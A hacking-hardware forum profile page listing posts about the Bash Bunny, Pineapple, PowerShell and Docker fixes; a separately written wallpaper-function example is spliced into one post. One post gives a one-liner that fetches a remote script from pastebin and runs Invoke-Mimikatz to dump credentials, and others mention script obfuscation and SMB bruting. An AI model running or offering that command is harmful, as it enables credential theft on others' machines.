PoSHMagiC0de

Dedicated Members
  • Content Count: 552
  • Days Won: 19

Everything posted by PoSHMagiC0de

  1. Wait, you are launching PowerShell from within PowerShell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently. If run from the command line, that will work. But if within PowerShell, then the below will need to be done.

     Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`""

     But if you are already in PowerShell, I do not see the need for the above.
  2. Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff, like when using WMI to launch processes with command line arguments.
  3. @Just_a_User Good minds think alike... or bad minds. Depends on your perspective. 🙂
  4. Okay, you can grab screenshots and video. Okay. Here is the thing... can this thing do playback? Now that would be cool. Imagine being able to cover your hack with a generic replacement view, kinda like the spies do with the static feed to video cameras of facilities they are breaking into. Why would you want that? Well, to hide your hack if you are emulating their screen, like through VNC or whatnot. Hide what the BB is doing. Just some ideas. Would be cool if the BB could communicate back to it to initiate screen hide. If the device then picks up screen cues to do stuff, then that would be cool too. I am just trying to squeeze out ideas for this thing that will entice me to get one.
  5. You can, or you can SSH into it and work on the command line if you are L33t enough. It has an internal web interface on the Pineapple. It is not served from their site. I believe the dashboard does connect to their portal, which is just to pull down news.
  6. Hmm, I sent Darren a while back, when he did a vlog on the wallpaper changer, a P/Invoke version of it that would instantaneously change the wallpaper. His version changed the same regkey but then looped through a command a bunch of times to get it to apply now. The version I am going to post in pieces will do it the minute it is run. First, the unmanaged function that is part of the Windows API is:

     public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni)

     This changes parameters in Windows and adds the changes to the appropriate files. The action parameter is what you are doing. 20 is changing wallpaper. The parameter after that I forget, but for setting wallpaper it is always 0. Then the lpvParam will be a string to the file you want to be the wallpaper, followed by a parameter to save to the ini file and/or send changes to the system (1 -bor 2). They are binary or'ed because we want both set. So, below is how I did it all in PowerShell.

     # First, here is the signature for the unmanaged command.
     $sig = "[DllImport(`"user32.dll`", SetLastError = true, CharSet = CharSet.Auto)]public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);"
     # Next, we add it as a type, give it a name (if you want to use it straight out) and a namespace to separate it from the rest of our Posh session.
     $SetWallpaper = add-type -MemberDefinition $sig -Name SetWallpaper -Namespace Win32Functions -PassThru
     # Now, if you want to save what your old wallpaper was, then the below will do it.
     $oldwallpaper = (Get-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name Wallpaper).Wallpaper
     # Place the path for the new wallpaper in a variable, or skip this and use it right out where the variable is used.
     $newpaper = "c:\somewhere\something.bmp"
     $SetWallpaper::SystemParametersInfo(20, 0, $newpaper, (0x01 -bor 0x02))
     # If you were going to 1-line this, then there is some prep work. First, base64 the sig. This makes it easier to use.
     $enc = [System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes($sig)))

     Now your command can be this on 1 line:

     powershell -C "$sig='W0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBDaGFyU2V0LkF1dG8pXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTeXN0ZW1QYXJhbWV0ZXJzSW5mbyhpbnQgdUFjdGlvbiwgaW50IHVQYXJhbSwgc3RyaW5nIGxwdlBhcmFtLCBpbnQgZnVXaW5JbmkpOw==';$SW=add-type -MemberDefinition ([System.Text.Encoding]::ASCII.GetString(([System.Convert]::FromBase64String($sig)))) -Name ShowWall -Namespace Win32 -passthru;$SW::SystemParametersInfo(20, 0, 'C:\somewhere\something.bmp', (0x01 -bor 0x02))"

     That base64 line is what was in $enc. You could also just put it inside the decode command instead of in a variable first. Enjoy.
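The same SystemParametersInfo call wrapped in a function that checks the Win32 return value and hands back the previous wallpaper so the change can be undone, as an added example that is not the post's own code; the function name and the placeholder paths are assumptions.

```powershell
# Added example, not the post's code: the P/Invoke call above wrapped in a
# function that checks the Win32 return value and returns the previous wallpaper
# so the change can be undone. Function name and paths are assumptions.
$sig = @"
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
"@

# Add-Type errors if the same type is compiled twice in one session, so guard it.
if (-not ('Win32Functions.SetWallpaper' -as [type])) {
    Add-Type -MemberDefinition $sig -Name SetWallpaper -Namespace Win32Functions | Out-Null
}

function Set-DesktopWallpaper {
    param([Parameter(Mandatory)][string]$Path)

    $SPI_SETDESKWALLPAPER = 20      # uAction: change the desktop wallpaper
    $SPIF_UPDATEINIFILE   = 0x01    # persist the change to the user profile
    $SPIF_SENDCHANGE      = 0x02    # broadcast WM_SETTINGCHANGE so it applies now

    # Resolve-Path throws if the file does not exist, so a bad path fails early.
    $full = (Resolve-Path -LiteralPath $Path).ProviderPath

    # Read the current value from the same registry key the post uses.
    $previous = (Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name Wallpaper).Wallpaper

    $ok = [Win32Functions.SetWallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $full, ($SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE))
    if ($ok -eq 0) {
        # SetLastError = true in the signature makes the Win32 error readable here.
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "SystemParametersInfo failed with Win32 error $err"
    }
    return $previous
}

# Usage with placeholder paths: apply a new wallpaper, then restore the old one.
$old = Set-DesktopWallpaper -Path 'C:\somewhere\something.bmp'
if ($old) { Set-DesktopWallpaper -Path $old | Out-Null }
```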
  7. Yeah... I read through this thread twice and still got lost. If I read it correctly from the original question, it is asked why Hak5 products are tied to their servers. Well, they are not. The Bash Bunny, Rubber Ducky, and all their stuff does not require you to speak back to their server. If you want new firmware and stuff, you can download it and install it, but usage does not require, nor does it, talk back to Hak5. The Cloud C2 might, and if it does, it will be for product registration, since that is one of their only products that has a free and paid tier so it has licenses. So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them. Support you get is all manual. Manually calling/emailing them and manually downloading and installing updates. Hmm, I think the Pineapple speaks back to their server, but only to return if there are updates, and I believe there is an option to turn that off.
  8. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for GPS data. Not even a REST API for it, else I would suggest building a service in whatever language you want that can hit the REST API of Bettercap to query that data on a time interval. For something like this, Kismet might be a better choice. Set up Kismet as a sensor on your remote devices that can communicate to a Kismet instance that is the server. Though, I wouldn't shoot that openly across the inet. Maybe create VPN or SSH tunnels back to the server and serve it through there? Have the Kismet listener listening on localhost only for the SSH tunnel, or the private VPN network for the VPN tunnel. You get it.
  9. Hmm, people always put the BB into the hacking category. I have actually been using mine more for admin stuff. When we get new customers, a lot of the time they do not have a domain or anything set up, so initial switching and stuff takes me going to each machine to run a few things, since there is no real network access. Usually that means, in the beginning, creating a local admin I know and giving it local admin remote rights so I can do things remotely, or installing AV and remoting software, etc. I have even used it with my partner here, where she is going out to a site and I need her to run some things, but she is oblivious to PowerShell and what I want her to do, so I script it on the Bunny and tell her to just put it in the machine while signed in as admin and it does it for her. So, I think we should reclassify the Bunny as more of an admin tool or an "Enhanced Technician Device". The purposes I listed above are the real reason I worked on the BBTPS.
  10. It is indeed not a good idea to move the switch while the BB is working. With that said, this is only precautionary, since most payloads do not require you to mess with the switch while they run, and doing so will only change mid-run what switch folder to look for payloads in. Example: if you move the switch from position 1 to 2 before the BB boots up to run payload.txt, then payload.txt from switch 2 runs. The switch position also dictates what get_switch returns, so moving it mid-payload when the payload is not designed for it may cause it to look for stuff in another switch folder. Hope-eye is a payload invented to let you know when it has passed its boot phase and entered the payload phase and is now safe to move the switch to select a pre-programmed payload. Example: it marks what switch position you are currently in and then begins an interval of light colors representing payloads, leaving a 1 second wait to give you time to move the switch when the payload you want comes up. After the wait it looks for a change in switch position. If changed, that payload is run, but it uses the old switch position it saved to find all the stuff it needs in the current switch folder. Let's just say the way it is done is safe.
  11. The issue with the BYOD is, right now, if they did offer something it would just be a reverse shell into the device. The reason the Pineapple has more options is mainly because it has an API that they can talk to, and they already have the code for the interface, so I can see it just being a reverse tunnel with the C2 speaking to the API. So... I would say if you want the C2 to support your device, or something on your device, give Hak5 something to interface with, like an app. Now, say you want to interface with the Raspberry Pi version of Kismet, which has an API. That would give them some target. Just having it connect to a Pi would be the same as just setting up your own reverse SSH, since Hak5 has no product for the Raspberry Pi except for the C2 server itself.
  12. I believe port 443 is for you to connect to the C2, and the SSH port 2022 is for the devices to connect back.
  13. If I do not compile my Go apps in the Alpine Docker container, I get the same error. Here is the fix below. Build a new container with this one additional line:

     RUN mkdir /lib64 && ln -s /lib/libc.musl-x86_64.so.1 /lib64/ld-linux-x86-64.so.2

     Enjoy.
  14. AV will trigger because the payloads that are copied to the BB are tagged as bad by AVs. Mimikatz is a password grabber, but is a payload for the BB to get passwords. So, yep, it will trigger, but if you are using the updater from the official site then it will just be copying them to the BB. If you are worried, you can always do the updating manually.
  15. Well, I guess this was coming. Google wants to break ad blockers in Chrome and does not care if they piss off their users. Looks like I am going full-blown Firefox. https://www.forbes.com/sites/kateoflahertyuk/2019/05/30/google-just-gave-2-billion-chrome-users-a-reason-to-switch-to-firefox/amp/
  16. This is a PowerShell module I have been using for a while now. Figured I will share it here. The git readme is thorough enough to explain how it works. One cool feature it has is, if you are planning to run your finished script as a command from the command prompt, then it warns if you are over the character limit. https://github.com/danielbohannon/Invoke-Obfuscation
  17. Awesome. I would only add 1 thing. A require_tool impacket. SMBConnection requires impacket.
  18. In the payload.txt put in:

     export DEFAULT_DELAY=XXXX

     I do not know if that will work, and was hoping one of the Hak5 folks would chime in with a yes or no if it is possible, since I do not see it in any of their documentation of the Bunny and they wrote the Q/Quack command, but I do not think that is going to happen. After looking through all the above, I am seeing you are going to need to do some reading up on what the Bash Bunny is, and maybe mess around with a Linux virtual machine. The BB is a Linux machine in a USB stick.
  19. Yeah, I have been having issues getting my non-domain-joined, updated Windows 10 machine to take SMB connections into it unless I screw with the token setting in the registry. So, I assume this is an enterprise payload, unless the home user/friend you are picking on is knowledgeable, has Win10 Pro and set up a home domain, or edited his machine to behave as a domain-joined machine. I was going to work on an impacket-implemented payload (use the actual library to make my own, using the SMBConnection library to spawn through connections). You could even skip the nmap scan, since SMBConnection will throw an error if it cannot connect. Since there is a fast PoC out there already, I am going to move on to working back on my own tool, since I have a week off this week. Going to use Go on the BB. Anyway, yeah, it is cool he got MM going on the BB, but I knew there would be overhead.
  20. Remember that any other features and payloads can be added on yourself, to be run once/if access is gained. The base payload should stay as is and just take improvements to how it works. Hmm, how fast does this payload spin up with Metasploit? Wondering if the same bruting could be done with impacket's smbclient?
  21. Nope. I mean, there might be an environment variable on the Bunny you can set. Or... it may not exist in the Bash Bunny version.
  22. Bash. The command-line shell for most Linux systems, like Bat files for Windows.
  23. Not really, no need for it since it is the Bash Bunny. You can probably do something like that with BashFu. Maybe they turned it into an environment variable on the Bash Bunny you initialize.
  24. Hmm, just started trying it out and it doesn't work half bad. I only made a web forensics image from the Kali image, but plan on doing one for wifi and testing out the privilege flag to see if it works for direct access. Also, to push the net stack I may try the Yersinia command-line version. Yersinia sometimes crashes my net stack when I run bare metal doing DHCP exhaustion. Let's see if it breaks faster in a Docker container, hehe.
  25. Hmm, do not know for sure, but that may be a Rubber Ducky-specific thing. Maybe someone can confirm, @Foxtrot.